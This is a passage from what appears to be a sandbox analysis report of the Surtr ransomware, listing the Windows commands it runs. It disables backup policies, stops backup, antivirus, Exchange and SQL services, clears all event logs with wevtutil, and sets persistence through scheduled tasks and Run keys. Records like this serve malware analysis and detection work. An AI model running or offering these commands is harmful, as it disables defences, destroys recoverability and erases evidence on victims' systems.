- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
    3⤵
    PID:2288
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "BackupExecJobEngine"
  2⤵
  PID:2324
- - C:\Windows\system32\net.exe
    net stop "BackupExecJobEngine"
    3⤵
    PID:2028
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "BackupExecJobEngine"
      4⤵
      PID:2176
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
  2⤵
  PID:2556
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
    3⤵
    PID:892
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
  2⤵
  PID:1984
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
    3⤵
    PID:2608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "BackupExecManagementService"
  2⤵
  PID:1660
- - C:\Windows\system32\net.exe
    net stop "BackupExecManagementService"
    3⤵
    PID:1640
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "BackupExecManagementService"
      4⤵
      PID:748
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
  2⤵
  PID:1488
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
    3⤵
    PID:1228
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
  2⤵
  PID:2460
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
    3⤵
    PID:2404
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "BackupExecRPCService"
  2⤵
  PID:2780
- - C:\Windows\system32\net.exe
    net stop "BackupExecRPCService"
    3⤵
    PID:1412
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "BackupExecRPCService"
      4⤵
      PID:2332
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
  2⤵
  PID:2532
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
    3⤵
    PID:2148
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "BackupExecVSSProvider"
  2⤵
  PID:1596
- - C:\Windows\system32\net.exe
    net stop "BackupExecVSSProvider"
    3⤵
    PID:1708
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "BackupExecVSSProvider"
      4⤵
      PID:2644
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
  2⤵
  PID:2416
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
    3⤵
    PID:2516
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "EPSecurityService"
  2⤵
  PID:2448
- - C:\Windows\system32\net.exe
    net stop "EPSecurityService"
    3⤵
    PID:2904
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "EPSecurityService"
      4⤵
      PID:2900
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c mkdir "C:\ProgramData\Service"
  2⤵
  PID:1944
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c mkdir "%TEMP%\Service"
  2⤵
  PID:2944
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta"
  2⤵
  - Drops startup file
  PID:2524
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.txt" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt"
  2⤵
  - Drops startup file
  PID:2812
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "IISAdmin"
  2⤵
  PID:1684
- - C:\Windows\system32\net.exe
    net stop "IISAdmin"
    3⤵
    PID:2700
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "IISAdmin"
      4⤵
      PID:2364
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%TEMP%\Service\Surtr.exe"
  2⤵
  PID:2788
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "IMAP4Svc"
  2⤵
  PID:2744
- - C:\Windows\system32\net.exe
    net stop "IMAP4Svc"
    3⤵
    PID:2768
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "IMAP4Svc"
      4⤵
      PID:216
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Public_DATA.surt" "%TEMP%\Service\Public_DATA.surt"
  2⤵
  PID:2712
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Private_DATA.surt" "%TEMP%\Service\Private_DATA.surt"
  2⤵
  PID:208
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "macmnsvc"
  2⤵
  PID:2436
- - C:\Windows\system32\net.exe
    net stop "macmnsvc"
    3⤵
    PID:2540
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "macmnsvc"
      4⤵
      PID:1876
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\ID_DATA.surt" "%TEMP%\Service\ID_DATA.surt"
  2⤵
  PID:2096
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.hta" "%TEMP%\Service\SURTR_README.hta"
  2⤵
  PID:2296
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.txt" "%TEMP%\Service\SURTR_README.txt"
  2⤵
  PID:2512
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "masvc"
  2⤵
  PID:2772
- - C:\Windows\system32\net.exe
    net stop "masvc"
    3⤵
    PID:2088
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "masvc"
      4⤵
      PID:3028
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +R /S "C:\ProgramData\Service"
  2⤵
  PID:2728
- - C:\Windows\system32\attrib.exe
    attrib +R /S "C:\ProgramData\Service"
    3⤵
    - Views/modifies file attributes
    PID:2544
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MBAMService"
  2⤵
  PID:1536
- - C:\Windows\system32\net.exe
    net stop "MBAMService"
    3⤵
    PID:2360
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MBAMService"
      4⤵
      PID:3064
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MBEndpointAgent"
  2⤵
  PID:2924
- - C:\Windows\system32\net.exe
    net stop "MBEndpointAgent"
    3⤵
    PID:2936
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MBEndpointAgent"
      4⤵
      PID:1276
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +R /S "%TEMP%\Service"
  2⤵
  PID:2684
- - C:\Windows\system32\attrib.exe
    attrib +R /S "C:\Users\Admin\AppData\Local\Temp\Service"
    3⤵
    - Views/modifies file attributes
    PID:1948
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "McAfeeEngineService"
  2⤵
  PID:1808
- - C:\Windows\system32\net.exe
    net stop "McAfeeEngineService"
    3⤵
    PID:608
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "McAfeeEngineService"
      4⤵
      PID:3000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F
  2⤵
  PID:1900
- - C:\Windows\system32\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2504
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "McAfeeFramework"
  2⤵
  PID:564
- - C:\Windows\system32\net.exe
    net stop "McAfeeFramework"
    3⤵
    PID:3012
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "McAfeeFramework"
      4⤵
      PID:2800
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "McAfeeFrameworkMcAfeeFramework"
  2⤵
  PID:752
- - C:\Windows\system32\net.exe
    net stop "McAfeeFrameworkMcAfeeFramework"
    3⤵
    PID:1268
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "McAfeeFrameworkMcAfeeFramework"
      4⤵
      PID:1752
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "McShield"
  2⤵
  PID:1648
- - C:\Windows\system32\net.exe
    net stop "McShield"
    3⤵
    PID:2120
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "McShield"
      4⤵
      PID:2112
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "mfemms"
  2⤵
  PID:2168
- - C:\Windows\system32\net.exe
    net stop "mfemms"
    3⤵
    PID:2004
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "mfemms"
      4⤵
      PID:1952
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "mfevtp"
  2⤵
  PID:2792
- - C:\Windows\system32\net.exe
    net stop "mfevtp"
    3⤵
    PID:2248
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "mfevtp"
      4⤵
      PID:764
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MMS"
  2⤵
  PID:348
- - C:\Windows\system32\net.exe
    net stop "MMS"
    3⤵
    PID:584
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MMS"
      4⤵
      PID:968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F
  2⤵
  PID:1468
- - C:\Windows\system32\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1132
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "mozyprobackup"
  2⤵
  PID:2276
- - C:\Windows\system32\net.exe
    net stop "mozyprobackup"
    3⤵
    PID:332
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "mozyprobackup"
      4⤵
      PID:1160
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MsDtsServer"
  2⤵
  PID:2124
- - C:\Windows\system32\net.exe
    net stop "MsDtsServer"
    3⤵
    PID:2172
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MsDtsServer"
      4⤵
      PID:1224
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MsDtsServer100"
  2⤵
  PID:1304
- - C:\Windows\system32\net.exe
    net stop "MsDtsServer100"
    3⤵
    PID:2676
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MsDtsServer100"
      4⤵
      PID:468
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe"
  2⤵
  - Drops startup file
  PID:1796
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
  2⤵
  PID:1512
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    3⤵
    - Adds Run key to start application
    PID:2008
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MsDtsServer110"
  2⤵
  PID:2104
- - C:\Windows\system32\net.exe
    net stop "MsDtsServer110"
    3⤵
    PID:1624
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MsDtsServer110"
      4⤵
      PID:744
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
  2⤵
  PID:1828
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    3⤵
    - Adds Run key to start application
    PID:2060
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSExchangeES"
  2⤵
  PID:1992
- - C:\Windows\system32\net.exe
    net stop "MSExchangeES"
    3⤵
    PID:356
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSExchangeES"
      4⤵
      PID:1120
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
  2⤵
  PID:1928
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    3⤵
    - Adds Run key to start application
    PID:2968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
  2⤵
  PID:1316
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    3⤵
    - Adds Run key to start application
    PID:604
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSExchangeIS"
  2⤵
  PID:1164
- - C:\Windows\system32\net.exe
    net stop "MSExchangeIS"
    3⤵
    PID:1608
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSExchangeIS"
      4⤵
      PID:2596
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSExchangeMGMT"
  2⤵
  PID:3684
- - C:\Windows\system32\net.exe
    net stop "MSExchangeMGMT"
    3⤵
    PID:3692
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSExchangeMGMT"
      4⤵
      PID:3700
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSExchangeMTA"
  2⤵
  PID:2172
- - C:\Windows\system32\net.exe
    net stop "MSExchangeMTA"
    3⤵
    PID:3668
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSExchangeMTA"
      4⤵
      PID:1932
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSExchangeSA"
  2⤵
  PID:2516
- - C:\Windows\system32\net.exe
    net stop "MSExchangeSA"
    3⤵
    PID:2552
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSExchangeSA"
      4⤵
      PID:2748
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSExchangeSRS"
  2⤵
  PID:2544
- - C:\Windows\system32\net.exe
    net stop "MSExchangeSRS"
    3⤵
    PID:1596
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSExchangeSRS"
      4⤵
      PID:3296
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSOLAP$SQL_2008"
  2⤵
  PID:1584
- - C:\Windows\system32\net.exe
    net stop "MSOLAP$SQL_2008"
    3⤵
    PID:1160
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSOLAP$SQL_2008"
      4⤵
      PID:2000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSOLAP$SYSTEM_BGC"
  2⤵
  PID:1892
- - C:\Windows\system32\net.exe
    net stop "MSOLAP$SYSTEM_BGC"
    3⤵
    PID:3712
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSOLAP$SYSTEM_BGC"
      4⤵
      PID:2460
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSOLAP$TPS"
  2⤵
  PID:884
- - C:\Windows\system32\net.exe
    net stop "MSOLAP$TPS"
    3⤵
    PID:3592
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSOLAP$TPS"
      4⤵
      PID:3608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSOLAP$TPSAMA"
  2⤵
  PID:3612
- - C:\Windows\system32\net.exe
    net stop "MSOLAP$TPSAMA"
    3⤵
    PID:212
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSOLAP$TPSAMA"
      4⤵
      PID:3712
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$BKUPEXEC"
  2⤵
  PID:876
- - C:\Windows\system32\net.exe
    net stop "MSSQL$BKUPEXEC"
    3⤵
    PID:7132
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQL$BKUPEXEC"
      4⤵
      PID:7140
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$ECWDB2"
  2⤵
  PID:7148
- - C:\Windows\system32\net.exe
    net stop "MSSQL$ECWDB2"
    3⤵
    PID:7156
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQL$ECWDB2"
      4⤵
      PID:7164
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$PRACTICEMGT"
  2⤵
  PID:3772
- - C:\Windows\system32\net.exe
    net stop "MSSQL$PRACTICEMGT"
    3⤵
    PID:3840
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQL$PRACTICEMGT"
      4⤵
      PID:3824
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$PRACTTICEBGC"
  2⤵
  PID:3856
- - C:\Windows\system32\net.exe
    net stop "MSSQL$PRACTTICEBGC"
    3⤵
    PID:3968
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQL$PRACTTICEBGC"
      4⤵
      PID:3964
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$PROFXENGAGEMENT"
  2⤵
  PID:3984
- - C:\Windows\system32\net.exe
    net stop "MSSQL$PROFXENGAGEMENT"
    3⤵
    PID:4012
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQL$PROFXENGAGEMENT"
      4⤵
      PID:3544
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$SBSMONITORING"
  2⤵
  PID:3520
- - C:\Windows\system32\net.exe
    net stop "MSSQL$SBSMONITORING"
    3⤵
    PID:3556
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQL$SBSMONITORING"
      4⤵
      PID:2460
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$SHAREPOINT"
  2⤵
  PID:4108
- - C:\Windows\system32\net.exe
    net stop "MSSQL$SHAREPOINT"
    3⤵
    PID:5096
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQL$SHAREPOINT"
      4⤵
      PID:220
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c for /F "tokens=*" %s in ('wevtutil.exe el') DO wevtutil.exe cl "%s"
  2⤵
  PID:2344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wevtutil.exe el
    3⤵
    PID:1920
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe el
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3388
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Analytic"
    3⤵
    - Clears Windows event logs
    - Suspicious use of AdjustPrivilegeToken
    PID:3460
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Application"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3264
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "DebugChannel"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3736
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "DirectShowFilterGraph"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3880
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "DirectShowPluginControl"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3900
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Els_Hyphenation/Analytic"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1356
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "EndpointMapper"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4040
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "ForwardedEvents"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3792
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "HardwareEvents"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5148
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Internet Explorer"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5184
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Key Management Service"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5252
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MF_MediaFoundationDeviceProxy"
    3⤵
    - Clears Windows event logs
    - Suspicious use of AdjustPrivilegeToken
    PID:3716
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Media Center"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5316
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationDeviceProxy"
    3⤵
    - Clears Windows event logs
    - Suspicious use of AdjustPrivilegeToken
    PID:5372
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationPerformance"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5408
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationPipeline"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5436
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationPlatform"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5464
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-IE/Diagnostic"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5484
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-IEDVTOOL/Diagnostic"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5516
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-IEFRAME/Diagnostic"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5540
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-JSDumpHeap/Diagnostic"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5568
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-PerfTrack-IEFRAME/Diagnostic"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5612
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-PerfTrack-MSHTML/Diagnostic"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5672
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ADSI/Debug"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5684
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-API-Tracing/Operational"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5740
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ATAPort/General"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5768
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ATAPort/SATA-LPM"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5800
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ActionQueue/Analytic"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5840
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AltTab/Diagnostic"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5864
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppID/Operational"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5884
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppLocker/EXE and DLL"
    3⤵
    PID:5912
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppLocker/MSI and Script"
    3⤵
    PID:5940
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Admin"
    3⤵
    PID:5980
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Analytic"
    3⤵
    PID:6020
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Debug"
    3⤵
    PID:6060
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Operational"
    3⤵
    PID:6092
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Problem-Steps-Recorder"
    3⤵
    PID:3804
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"
    3⤵
    - Clears Windows event logs
    PID:2560
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"
    3⤵
    PID:1716
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory"
    3⤵
    PID:3000
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory/Debug"
    3⤵
    PID:3200
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Telemetry"
    3⤵
    PID:2416
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Audio/CaptureMonitor"
    3⤵
    PID:3216
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Audio/Operational"
    3⤵
    PID:6168
